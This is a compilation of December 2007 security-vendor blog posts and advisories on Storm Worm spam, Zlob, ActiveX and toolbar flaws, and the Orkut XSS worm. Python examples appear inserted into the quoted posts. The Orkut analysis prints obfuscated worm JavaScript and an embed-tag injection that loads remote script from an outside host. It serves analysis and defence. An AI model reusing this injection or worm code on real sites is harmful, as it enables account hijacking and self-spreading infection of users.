December 2007 - Posts

 

Is that really you, Santa?

Look, here comes Santa...on his sleigh with Rudolph the red-nosed reindeer and a computer. This year, he seems to have decided to distribute free gifts through email...but with a catch.

An email that contains a link to a malicious file reportedly arrives as the following:
Subject: Seasons Greetings
Message Body:

listen up,

This Christmas, we want to show you something you will really enjoy.
This might not be fun for the whole family, but I bet you'll like it come one take 2 min and check it out.
hxxp://merrychrist[REMOVED]

If you click the link, the site shows pictures of women dressed as "Mrs. Clause"; clicking a picture downloads the malicious file stripshow.exe, a new variant of Trojan.Peacomm.D.

[Image: Mrs-Clause.gif]

Once it runs, you will be rewarded with malicious gifts for free!! As we have warned in the past, users take serious risks when they are enticed by free stuff on the Internet. Always keep your antivirus software up to date and follow safe computing practices.

Happy holidays!!

Posted by Shunichi Imano on December 23, 2007 08:48 PM

Source: Symantec Security Response Weblog: Is that really you, Santa?

 

It's a Stormy Christmas Eve..
Posted by Esz @ 08:54 GMT


So, we were wrong. It turns out that the Storm gang was going to do a Christmas Malware run after all, they just decided to start it surprisingly late - on Christmas eve itself!
There's been a series of spam messages redirecting traffic to the malicious site merrychristmasdude.com. This site serves a new version of the Storm Worm. The IP address of the site changes every second. We already detect it as Email-Worm.Win32.Zhelatin.pd.
Here are the Screen shots of the site:
[Screenshot: stormxmas]
[Screenshot: stormxmas2]
Don't be naughty and go wandering to that domain. Please do not click on the "Download For Free Now" button, as it will get you infected. Merry Christmas, y'all!

Source: It's a Stormy Christmas Eve.. - F-Secure Weblog : News from the Lab

 

Anticipated Storm-Bot Attack Begins

Published: 2007-12-24,
Last Updated: 2007-12-24 13:11:38 UTC
by Kevin Liston (Version: 3)

Overview and Blocking Information

Shortly after 0000 GMT 24-DEC-2007 reports came in indicating that the Storm Botnet was sending out another wave of attempts to enlist new members.  This version is a Christmas-themed stripshow directing victims to merrychristmasdude.com.

The message comes in with a number of subjects:

Subject: I love this Carol!
Subject: Santa Said, HO HO HO
Subject: Christmas Email
Subject: The Perfect Christmas
Subject: Find Some Christmas Tail
Subject: Time for a little Christmas Cheer

Updated subjects:
“Merry Christmas To All”
“Warm Up this Christmas”
“Mrs. Clause Is Out Tonight!”
“The Twelve Girls Of Christmas”
“Jingle Bells, Jingle Bells”
“Cold Winter Nights”

The body is something similar to:

do you have a min?



This Christmas, we want to show you something you will really enjoy. Forget all the stress for two min and feast your eyes on these. ;-)

http://merry christmasdude.com/

[the domain was interrupted for your protection]

Thanks Kevin for the initial report.

I recommend that you apply blocks on that domain (merrychristmasdude.com) for both outbound HTTP requests and incoming emails.

Under The Hood

The domain appears to be registered through nic.ru and hosted on a fast-flux network of at least 1000 nodes.  Like previous Storm waves, the binary changes approximately every 15 minutes; supposedly updating the peer-list used by the P2P network that the bot-net uses for command and control.

Russ has a nice and tidy analysis available at: http://holisticinfosec.blogspot.com/2007/12/storm-bot-stripshow-analysis.html
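The fast-flux behaviour the diary describes (a new address set on nearly every query, a TTL near zero, hosts on many unrelated networks) can be scored from repeated DNS lookups. The Python below is an added example, not code from the diary or from the analysis linked above; its DNS answers are constructed to resemble what is described, and its thresholds are assumptions chosen for illustration:

```python
"""Fast-flux heuristic over repeated DNS lookups of one hostname.

Added example; it is not from the ISC diary. The lookups below are
constructed to resemble what the diary describes for merrychristmasdude.com
(a new set of A records on nearly every query, very low TTL, hosts spread
across unrelated networks) and are not real observations. The thresholds in
is_fast_flux() are this example's assumptions, not published values.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass


@dataclass
class Lookup:
    ts: int               # seconds since the start of observation
    ttl: int              # TTL of the A records in this answer
    a_records: list[str]  # A records returned by this query


def flux_indicators(lookups: list[Lookup]) -> dict:
    """Summarise how a hostname's resolution behaved over a series of lookups."""
    seen_ips: set[str] = set()
    prefixes: set[str] = set()   # distinct /16s, a rough proxy for unrelated hosting
    churn = 0                    # answers that introduced at least one never-seen IP
    for lk in lookups:
        batch = set(lk.a_records)
        if batch - seen_ips:
            churn += 1
        seen_ips |= batch
        for ip in batch:
            net = ipaddress.ip_network(f"{ip}/16", strict=False)
            prefixes.add(str(net))
    return {
        "lookups": len(lookups),
        "unique_ips": len(seen_ips),
        "unique_prefixes": len(prefixes),
        "churn_ratio": churn / len(lookups),
        "min_ttl": min(lk.ttl for lk in lookups),
    }


def is_fast_flux(ind: dict, max_ttl: int = 300, min_ips: int = 10,
                 min_prefixes: int = 5, min_churn: float = 0.5) -> bool:
    """Flag a hostname when it combines a short TTL with many IPs, many
    networks and an answer set that keeps changing. A busy CDN can trip one
    or two of these on its own; the combination is what marks flux hosting."""
    return (ind["min_ttl"] <= max_ttl
            and ind["unique_ips"] >= min_ips
            and ind["unique_prefixes"] >= min_prefixes
            and ind["churn_ratio"] >= min_churn)


# Constructed sample: 12 queries one second apart, each answered with two
# addresses never returned before, TTL 0. The addresses are made up.
FLUX_SAMPLE = [
    Lookup(ts=i, ttl=0,
           a_records=[f"{110 + i}.{20 + i}.5.{30 + i}", f"{150 + i}.{60 + i}.9.{40 + i}"])
    for i in range(12)
]

# Constructed sample of an ordinary host: same address every time, TTL one hour.
NORMAL_SAMPLE = [Lookup(ts=i * 600, ttl=3600, a_records=["192.0.2.10"]) for i in range(5)]


def classify(lookups: list[Lookup]) -> str:
    return "fast-flux" if is_fast_flux(flux_indicators(lookups)) else "normal"


if __name__ == "__main__":
    for name, sample in (("flux host", FLUX_SAMPLE), ("normal host", NORMAL_SAMPLE)):
        print(name, flux_indicators(sample), classify(sample))
```

Run as-is it scores the two samples. In practice, feed it the answers from polling the domain through your resolver for a few minutes, and treat a hit as a reason to go through the proxy logs for that domain rather than as proof on its own, since large content-delivery networks can trip one or two of the indicators.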

Speaking of Blogspot

If you google for merrychristmasdude.com you'll see a number of spam blogs set up with that domain in their body and directing traffic to siski.cn (take a look for that in your proxy logs while you're at it.)

Visiting skiski.cn will redirect you over to shockbabetv.com and attempt to install a fake video codec, which itself appears to be a downloader to deliver more coal to your stocking.


Kevin Liston (kliston -at- isc.sans.org)

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

MS07-069 - Post install issue

Published: 2007-12-19,
Last Updated: 2007-12-21 05:09:23 UTC
by Stephen Hall (Version: 2)

We have been working with Microsoft and a couple of our readers on an issue they have been having with MS07-069: Internet Explorer crashing after the cumulative IE update has been installed.

Well the Microsoft MSRC have updated their blog and there is a KB article which provides a workaround.

So if you have a customised installation and have been having IE issues since MS07-069, this could be your solution.

UPDATE

Microsoft has released an update to fix this problem.  You can find it here. (thanks Susan).

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

Google Toolbar Custom Button Installer Dialog Spoofing Weakness

Secunia Advisory:
SA28166

Release Date:
2007-12-21

Critical:

Less critical

Impact:
Spoofing

Where:
From remote

Solution Status:
Unpatched

Software:
Google Toolbar 1.x
Google Toolbar 2.x
Google Toolbar 3.x
Google Toolbar 4.x

 

Description:
Aviv Raff has discovered a weakness in Google Toolbar, which can be exploited by malicious people to conduct spoofing attacks.

The weakness is caused due to an error when handling domains that are being displayed in the Custom Button Installer dialog. This can be exploited to spoof the origin of a custom button and the domain information in the "privacy considerations" section via a specially crafted xml file in combination with a redirector page.

The weakness is confirmed in Google Toolbar version 4.0.1601.4987 for Internet Explorer. Other versions may also be affected.

Solution:
Do not rely on information in the Custom Button dialog when installing custom buttons.

Provided and/or discovered by:
Aviv Raff

Original Advisory:
http://aviv.raffon.net/2007/12/18/GoogleToolbarDialogSpoofingVulnerability.aspx

Source: Google Toolbar Custom Button Installer Dialog Spoofing Weakness - Advisories - Secunia

 

Comcast starts blocking email willy-nilly

Spam voting

A NEW feature on Comcast that blocks email identified as spam has been causing merry hell.

In the good old days, if two people decided that an email from an outfit was spam, that email would go into the junk mailbox wherever else it appeared.

Writing in his blog, one angry customer said that Comcast has recently upped the ante and will block all email from the offending server.

The punter works for a news site and says that Comcast users who have requested daily news emails from the site are being denied email they have asked for.

He had tried to get Comcast to look at the problem, but the outfit did not seem particularly interested. Loyal readers of the news site who have complained that their news is not being delivered have also been ritualistically ignored.

After much shouting, Comcast has lifted the block on the IP range. But this seems to be a problem with several US ISPs. For example, one ISP in Florida and another in California are convinced that every email from Bulgaria must be spam and are refusing to receive mail from addresses ending in .bg.

Ironically, the same mail sent from yahoo.com gets through.

Source: Comcast starts blocking email willy-nilly - The INQUIRER

 

Is Trojan.Zlob Getting Honest? Naaahh...

New fake codec Web sites often appear out of nowhere (we are pretty used to seeing them) and in most cases if you download and run the "codec" you get infected with a variant of Trojan.Zlob. Nothing new, but this time I found something different. I was testing a fake codec Web site when I came upon a new variant. The installation step is the usual:


Figure 1: Standard installation process

However, after that the browser is started with a Google search for the word "sex." The interesting part is that while browsing you will now frequently be faced with this popup:


Figure 2: Frequently recurring message box

Well, I really appreciate the honesty of Zlob telling me I was infected! Clicking the OK button will force the download of “IE Defender,” which is an antispyware application. (IE Defender is also a potentially unwanted application. It is a wannabe malware scanner that is used in conjunction with the Zlob threat. You can find more details about IE Defender in the related write-up here.)

Of course, it's not over yet. Zlob also installs a browser helper object (BHO, a module for Internet Explorer used to integrate added functionality) in order to show the previously mentioned popup during Web browsing. A quick analysis of the BHO revealed some other interesting features. It is capable of hijacking Google results and redirecting them to the IE Defender Web site:


Figure 3: Google search reports a fake error box and a link to pornographic content

A fake error box is shown in the Google results, as well as a link to a pornographic video on YouTube. This is meant to panic the user: most users wouldn't want someone else using their computer for an innocent Google search and finding a link to pornographic content in the results. (Incidentally, you might notice that the search word I used was "potato.") Clicking the error box brings the user to the IE Defender Web site.

If the annoying popup was not enough, surely an error message from Google will make you think twice about the potential dangers! We know very well how these threats can spoof legitimate Web sites or security products in order to convince a user to buy their own security applications. Google is not the only one being targeted. Further analysis reveals that Yahoo is also supposedly reporting the same behavior:


Figure 4: Yahoo search shows a fake error box

Not only do you see a fake error box in the search results, but also the first legitimate result is hijacked so that if it is clicked it will redirect the user to the IE Defender fake online scan Web site. Also, Live Search is not immune:


Figure 5: A legitimate search result in Live Search has been redirected

In this case there are no fake error boxes shown in the search results, but the first legitimate result entry is hijacked in order to point to the IE Defender Web site. In addition, the MySpace and MSN Web sites are targeted with the same technique.

Interestingly, if you decide to download IE Defender and run a scan, it will actually detect the Zlob infection. Of course you have to pay if you want to clean up the reported infection. So it looks like Zlob is really kind: after infecting your system it reveals that your system is infected, then tries to redirect you to a Web site where you can download antispyware software that is supposedly able to remove it (for only $38.95 USD). What a lovely Trojan! I didn't actually purchase the IE Defender software, because it would probably do more harm than good. I'd rather let my Symantec products (with the latest definitions, of course) take care of the antispyware work!

Posted by Andrea Lelli on December 21, 2007 05:00 AM

Source: Symantec Security Response Weblog: Is Trojan.Zlob Getting Honest? Naaahh...

 

HP Software Update ContentCollection Class ActiveX Control Insecure Method

Secunia Advisory:
SA28177

Release Date:
2007-12-20

Critical:

Less critical

Impact:
Manipulation of data

Where:
From remote

Solution Status:
Unpatched

Software:
HP Software Update 3.x

Description:
porkythepig has reported a vulnerability in HP Software Update, which can be exploited by malicious people to overwrite arbitrary files on a user's system.

The vulnerability is caused due to the HPRulesEngine.ContentCollection.1 ActiveX Control (RulesEngine.dll) including the insecure "SaveToFile()" method, which writes to a file specified as an argument. This can be exploited to overwrite and corrupt arbitrary files on the system in the context of the currently logged-on user.

The vulnerability is reported in version 3.0.8.4. Other versions may also be affected.

Solution:
Set the kill-bit for the affected ActiveX control.

Provided and/or discovered by:
porkythepig

Original Advisory:
http://www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt
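Secunia's workaround is to set the kill-bit. As an added example (not part of the advisory or of HP's software), the Python below writes the registry change out as a .reg file and checks the result of a reg query afterwards. The CLSID in it is a placeholder: the advisory names the control only by ProgID and DLL, so the real value has to be read from HKCR\HPRulesEngine.ContentCollection.1\CLSID on an affected machine and substituted:

```python
r"""Kill-bit helper for an ActiveX control.

Added example; not from the advisory or from HP. Setting a kill-bit means
creating the key
  HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}
with the DWORD value "Compatibility Flags" set to 0x400, after which Internet
Explorer refuses to instantiate that control. On 64-bit Windows the 32-bit
Internet Explorer reads the Wow6432Node copy of the key, so both are written.
The advisory names the control only by ProgID (HPRulesEngine.ContentCollection.1)
and by DLL (RulesEngine.dll); the CLSID below is a placeholder and must be
replaced with the value under HKCR\HPRulesEngine.ContentCollection.1\CLSID
on an affected machine.
"""
import re

KILL_BIT = 0x400
PLACEHOLDER_CLSID = "{00000000-0000-0000-0000-000000000000}"  # assumption, not the real CLSID
_CLSID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
_REG_DWORD_RE = re.compile(r"Compatibility Flags\s+REG_DWORD\s+0x([0-9A-Fa-f]+)")


def killbit_keys(clsid: str) -> list:
    """Native and Wow6432Node registry keys that carry the kill-bit for a CLSID."""
    if not _CLSID_RE.match(clsid):
        raise ValueError(f"not a CLSID: {clsid!r}")
    ax = r"Microsoft\Internet Explorer\ActiveX Compatibility"
    return [
        rf"HKEY_LOCAL_MACHINE\SOFTWARE\{ax}\{clsid}",
        rf"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\{ax}\{clsid}",
    ]


def killbit_reg_file(clsid: str) -> str:
    """Text of a .reg file; import it as an administrator with `reg import killbit.reg`."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for key in killbit_keys(clsid):
        lines += [f"[{key}]", f'"Compatibility Flags"=dword:{KILL_BIT:08x}', ""]
    return "\n".join(lines)


def parse_reg_query(output: str):
    """Read the flags value out of `reg query <key> /v "Compatibility Flags"` output.
    Returns None when the value (or the whole key) is absent."""
    m = _REG_DWORD_RE.search(output)
    return int(m.group(1), 16) if m else None


def killbit_set(flags) -> bool:
    """True only if the kill-bit (0x400) is present in the flags value."""
    return flags is not None and bool(flags & KILL_BIT)


# Constructed sample of what `reg query` prints once the kill-bit is in place.
SAMPLE_REG_QUERY = (
    "\r\n"
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
    "\\{00000000-0000-0000-0000-000000000000}\r\n"
    "    Compatibility Flags    REG_DWORD    0x400\r\n"
)

if __name__ == "__main__":
    print(killbit_reg_file(PLACEHOLDER_CLSID))
    print("kill-bit set:", killbit_set(parse_reg_query(SAMPLE_REG_QUERY)))
```

The check step matters: a kill-bit only takes effect under the CLSID that Internet Explorer actually resolves for the control, so after importing the file, query the key on the machine and confirm the value reads back with bit 0x400 set.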

Source: HP Software Update ContentCollection Class ActiveX Control Insecure Method - Advisories - Secunia

********************************************************************

Title: Microsoft Security Bulletin Minor Revision

Issued: December 20, 2007

********************************************************************

Summary

=======

The following bulletin has undergone a minor revision increment.

Please see the appropriate bulletin for more details.

* MS07-069 - Critical

Bulletin Information:

=====================

* MS07-069 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-069.mspx

- Reason for Revision: Bulletin revised to reflect a new Security Update FAQ entry for a known issue documented in KB946627.

- Originally posted: December 11, 2007

- Updated: December 20, 2007

- Bulletin Severity Rating: Critical

- Version: 1.3

 

Rootkits in China Part 1

Thursday December 20, 2007 at 9:52 am CST
Posted by Xing Su


The term "rootkit" originally referred to the set of tools an intruder installed on a compromised Unix system to keep root access and hide their presence. The definition has evolved over time: nowadays the term refers to backdoor programs that run with elevated privileges and are designed to evade detection by users, administrators and rootkit detection software. Rootkits first appeared in China in 2001 and have evolved substantially since then.

These days most rootkits are installed through exploitation of web browser vulnerabilities or by viruses and worms. In some cases, rootkits are bundled with images that exploit image library flaws to gain access to systems. In other cases, exploits for previously unknown (zero-day) vulnerabilities are placed on web sites and used to compromise browsers and install rootkits. For example, exploits for the zero-day vulnerability identified by CVE-2007-0038 were found on many Chinese websites several months before a patch was released.

In other cases, popular websites and public forums are hacked and their content modified to include exploits that install rootkits on user systems. Often, attackers exploit script injection vulnerabilities to gain access to these web sites. They then upload exploits for known issues like MS06-001, MS06-014, MS06-055, MS07-017, the Baofeng ActiveX vulnerability, the RealPlayer ActiveX vulnerability and so on.

In China, many rootkits also spread via malware that targets a popular IM client named QQ. Once a QQ user's machine has been compromised by a rootkit, it sends messages containing links to malicious websites to all of that user's QQ friends. If those users click the links, they too are targeted. This method of propagation is widespread and difficult to defend against.

Another technique used to spread rootkits is the addition of malicious programs to pirated software such as Windows, Photoshop and Office. People who download and install these pirated programs are infected by the rootkits bundled with them. Since pirated software is popular in China, many machines are infected this way.

Stay tuned for Part 2…..


Source: Computer Security Research - McAfee Avert Labs Blog

 

Pinch Malware Authors Busted
Posted by Alexey @ 16:30 GMT


Nikolay Patrushev, head of the Russian FSB (Federal Security Service), recently announced that over 1.4 million hacker attacks against federal sites were repelled in 2007 alone.
Patrushev also stated that the authors of the famous Pinch trojan (also known as LdPinch or PdPinch) have been identified and are now awaiting trial. Pinch was produced in a very professional manner, with the authors creating easy-to-use tools to quickly extract stolen information from infected computers.
The two malware authors are reported to be Russian citizens Ermishkin and Farhutdinov. According to some reports, Pinch-based malware has infected tens of millions of personal computers worldwide. The financial losses due to Pinch infections can hardly be calculated.

[Screenshot: Pinch Parser]

See Patrik's earlier post for more details on some of the tools used.

Source: Pinch Malware Authors Busted - F-Secure Weblog : News from the Lab

 

The Orkut Worm Has Landed!

Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users were affected. The exploit was contained in a JavaScript file, aptly named "virus.js", which was injected using an embed tag. Here is a snippet of the JavaScript file:

// Standard JavaScript "packer" unpack routine: p is the packed source and k the
// token table; every token e(c) in p is replaced with k[c] and the rebuilt
// script is handed to setTimeout below, which evaluates it.
function $(p,a,c,k,e,d) {
 e=function(c) {
  return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
 };
 if(!''.replace(/^/,String)){
  while(c--){d[e(c)]=k[c]||e(c)}
  k=[function(e){return d[e]}];
  e=function(){return'\\w+'};
  c=1
 };
 while(c--){
  if(k[c]){
   p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
  }
 }
 return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];
7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?";
m="+m.2f():"")+(c?";
c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);
6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?";
9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);
3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));
f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&
15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);
3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};

We can see from the above code that the JavaScript is heavily obfuscated: it is wrapped in a standard JavaScript "packer" that rebuilds the real script from a token table before running it. After decoding and analysing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when virus.js executes it forces the user to join a community called "Infectados pelo Vírus do Orkut". The name is Portuguese and translates to "Infected by the Orkut Virus".

This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends each friend a malicious scrap; Orkut scrap entries are the worm's propagation vector. Below is an example of the code that defines the Orkut scrap (the first line is the lure text, in Portuguese, roughly "2008 is coming... may it start really well for you"):

2008 vem ai… que ele comece mto bem par avc
<br/>
[silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver]
<br/>
<embed src=http://www.orkut.com/LoL.aspx type=
"application/x-shockwave-flash" wmode="transparent');
script=document.createElement('script');
script.src='http://files.myopera111.com/[REMOVED].js';
document.getElementsByTagName('head')[0].appendChild
(script);escape('" width="1" height="1">
</embed>

When you look at the code there are a few attributes for the embed tag, such as wmode, width, height, etc. The embed tag expects these attributes in order to create a flash object to display the flash content. Now when you look closely at the code, notice the wmode attribute:

wmode="transparent');

The author has closed the wmode value with '); and added script code in the attribute value itself. Let's analyze this further. We tested the script with a harmless variant of the malicious scrap:

<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">

When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:

<script type="text/javascript">
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx',
   '337533968', '1', '1', '9', '#FFFFFF',
   'autohigh', '', '', '337533968');
flashWriter._addParam('wmode', 'transparent');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv337533968');</script>

The Orkut application parsed the scrap text and created the flash object with values specified in the scrap.
If we look at the source code of the malicious scrap it looks like the sample below (the injected code is the three lines between the two _addParam calls). Note the trailing escape(' at the end of the injected value: the template's own closing ') then completes it as the harmless call escape(''), so the injected code integrates without a syntax error:

flashWriter._addParam('wmode', 'transparent');
script = document.createElement('script');
script.src = 'http://files.myopera.com/virusd[REMOVED]';
document.getElementsByTagName('head')[0].appendChild(script);
escape('');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');

Based on what we have seen so far we can infer that the Orkut application's filters failed to parse this attribute in the request. They took the whole wmode value as-is and added it to the rendering code:

flashWriter._addParam('wmode', 'transparent'); (malicious script)

In this way the worm inserts a malicious script through the embed tag and uses it for propagation. Interestingly, a victim doesn't need to click on the scrap: when the scrapbook is loaded, the injected code fetches virus.js silently. Note that the allowScriptAccess=never parameter offers no protection here, because the injected code never runs inside the Flash object at all; it executes as part of the page's own script. The JavaScript then takes the cookies and tokens of the logged-in user and uses them to spread the worm further.
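The root cause is that an attribute value was written into a JavaScript string literal with no escaping for that context. The Python below is an added example, not Orkut's code; it models the inferred server-side rendering with a constructed scrap in the worm's shape, and the script URL in the sample is a placeholder. render_vulnerable() reproduces the breakout, and render_hardened() shows the two fixes: escape for the JavaScript-string context, and check wmode against its three legal values:

```python
"""The scrap-to-script injection from the Orkut worm, reproduced and fixed.

Added example; this is not Orkut's code. It models what the post infers:
attribute values from a user's <embed> tag were copied verbatim into
JavaScript string literals in the page, so a wmode value ending in
  transparent');
closes the literal and the _addParam call, and whatever follows runs as
script. render_vulnerable() reproduces that; render_hardened() escapes for
the JavaScript-string context and restricts wmode to its documented values.
The scrap below is constructed in the worm's shape; its script URL is a
placeholder, not the real one.
"""
import re

# Constructed scrap: same structure as the worm's, placeholder script URL.
MALICIOUS_SCRAP = (
    '<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" '
    'wmode="transparent\');'
    "script=document.createElement('script');"
    "script.src='http://example.invalid/virus.js';"
    "document.getElementsByTagName('head')[0].appendChild(script);"
    'escape(\'" width="1" height="1"></embed>'
)

WMODE_ALLOWED = {"window", "opaque", "transparent"}


def extract_attr(tag: str, name: str):
    """Naive attribute grab: the value is everything between the double quotes."""
    m = re.search(rf'\b{name}="([^"]*)"', tag)
    return m.group(1) if m else None


def render_vulnerable(src: str, wmode: str) -> str:
    """Builds the rendering script the way the post shows Orkut did: by pasting
    attribute values straight into JavaScript source."""
    return (
        f"var flashWriter = new _SWFObject('{src}', '1', '1');\n"
        f"flashWriter._addParam('wmode', '{wmode}');\n"
        "flashWriter._addParam('allowNetworking', 'internal');\n"
        "flashWriter._addParam('allowScriptAccess', 'never');\n"
    )


_JS_ESCAPE = {
    "\\": "\\\\", "'": "\\'", '"': '\\"', "\n": "\\n", "\r": "\\r",
    "<": "\\x3c", ">": "\\x3e", "&": "\\x26",          # keeps </script> inert
    "\u2028": "\\u2028", "\u2029": "\\u2029",          # JS line terminators
}


def js_string(value: str) -> str:
    """Quote value as a single-quoted JavaScript string literal. Every
    character that could end the literal, the statement or the <script>
    element is written as an escape, so the result is always one literal."""
    out = []
    for ch in value:
        if ch in _JS_ESCAPE:
            out.append(_JS_ESCAPE[ch])
        elif ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append(f"\\u{ord(ch):04x}")
        else:
            out.append(ch)
    return "'" + "".join(out) + "'"


def render_hardened(src: str, wmode: str) -> str:
    """Same output shape, but values are escaped for the context they land in,
    and wmode, which has only three legal values, is checked against that
    list (falling back to the player's default, 'window')."""
    if wmode not in WMODE_ALLOWED:
        wmode = "window"
    return (
        f"var flashWriter = new _SWFObject({js_string(src)}, '1', '1');\n"
        f"flashWriter._addParam('wmode', {js_string(wmode)});\n"
        "flashWriter._addParam('allowNetworking', 'internal');\n"
        "flashWriter._addParam('allowScriptAccess', 'never');\n"
    )


if __name__ == "__main__":
    wmode = extract_attr(MALICIOUS_SCRAP, "wmode")
    print("--- vulnerable ---\n" + render_vulnerable("http://www.orkut.com/LoL.aspx", wmode))
    print("--- hardened ---\n" + render_hardened("http://www.orkut.com/LoL.aspx", wmode))
```

The escaping is deliberately context-specific: HTML entity encoding is the wrong tool inside a <script> block, where the browser does not decode entities; the characters that matter there are the quote, the backslash, the line terminators and the </script> sequence, and js_string() escapes all of them. The allow-list on wmode is the stronger control for this particular attribute, and the escaping is what protects free-form values such as the src URL.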

This worm illustrates how a simple script injection exploit could affect a large social networking site. Remember, users didn’t have to click anything as the malicious script runs silently as soon as the page is loaded. This worm could have been used for other malicious purposes, such as stealing cookies, exploiting other vulnerabilities, or stealing sensitive data as well.

As of today, the virus.js script is no longer available on the site and it seems as if there have been adequate checks implemented by Orkut to validate content when posting a scrap. The malicious scraps have also been deleted from the scrapbook of the infected users.

Symantec has built a number of excellent Web browsing protections into our 2008 product range.
The worm is detected by Symantec's antivirus products with certified definitions of 12/19/2007 rev. 7 and greater as JS.Woorkut. We recommend that you keep your Symantec products up-to-date, patch your systems, and run your browser with limited options enabled.

Posted by Umesh Wanve on December 20, 2007 08:30 AM

Source: Symantec Security Response Weblog: The Orkut Worm Has Landed!

 

The darker side of online virus scanners

Aleks
December 20, 2007 | 15:47  GMT


Online antivirus services such as VirusTotal (www.virustotal.com) and VirusScan (http://virusscan.jotti.org) have been around for a few years now. Services like this mean that any user can scan a suspicious file for malicious code online. These services differ from the online scanners offered on antivirus vendor sites by scanning files with several antivirus products simultaneously. For instance, VirusTotal currently uses 32 antivirus products to check suspicious files!

But as so often happens, something that can be used for good – helping users check the integrity of their files – can also be used by virus writers. They quickly caught on to the fact that services like the ones mentioned above could be used to test how well their creations can evade popular antivirus solutions. If a new Trojan or worm can be detected by an antivirus, the author will deliberately modify it until it isn't detected any more. The result? The heuristics used in the vast majority of antivirus products are helpless when confronted by such carefully prepared malicious programs.

By default, VirusScan, VirusTotal and other services send all suspicious files to antivirus companies. If a file is detected by, say, 10 antivirus products, and the other 22 don't detect it, the file will be sent to the 22 relevant virus labs for analysis and to be added to the antivirus databases. This significantly reduces the time taken by antivirus companies to react during epidemics and also increases the overall detection rate. If the user doesn't want a file to be sent to the antivirus companies, they have to disable this option when scanning the file.

However, there's a rumour in virus writing circles that all files are sent to virus labs, regardless of whether or not the option is enabled. Cyber criminals are now offering a solution for the tin-foil hat brigade – similar services designed expressly for virus writers. You have to pay to use the service, but there's a guarantee that no file will be sent to an antivirus company.

One example is AvCheck.ru. The creators of this site offer to scan files using 15 antivirus programs and 'guarantee privacy for you and your files'. Of course they want money for it – a dollar per file.


We can only admire the entrepreneurial spirit behind this site. But we're not going to wish them success. And after all, the site could be closed at any moment, and a court case could be raised against the creators of the site by the antivirus companies whose products are being used in clear violation of license agreements.

Source: Viruslist.com - Analyst's Diary

 

Cisco Firewall Services Module Denial of Service Vulnerability

Secunia Advisory:
SA28175

Release Date:
2007-12-20

Critical:

Moderately critical

Impact:
DoS

Where:
From remote

Solution Status:
Vendor Workaround

Software:
Cisco Firewall Services Module (FWSM) 3.x

CVE reference:
CVE-2007-5584

Description:
A vulnerability has been reported in the Cisco Firewall Services Module (FWSM), which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an unspecified error in the processing of data in the control-plane path with Layer 7 Application Inspections. This can be exploited to cause a crash and reload the FWSM via specially crafted network traffic.

The vulnerability is reported in FWSM System Software version 3.2(3).

Solution:
Update to FWSM software version 3.2(4) (available approximately 2007-12-31).

Apply vendor workaround (see vendor advisory for details).

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml

Source: Cisco Firewall Services Module Denial of Service Vulnerability - Advisories - Secunia

 

Orkut XSS Worm

Published: 2007-12-19,
Last Updated: 2007-12-19 17:57:39 UTC
by Tom Liston (Version: 1)

A vulnerability in the social networking site Orkut that allowed users to inject HTML and JavaScript into their profiles set the stage for a persistent XSS worm that appears to have affected approximately 400,000 Orkut users.  The malicious code is apparently fetched from the site "http://files.myopera.com" and is called, conveniently enough, "virus.js."


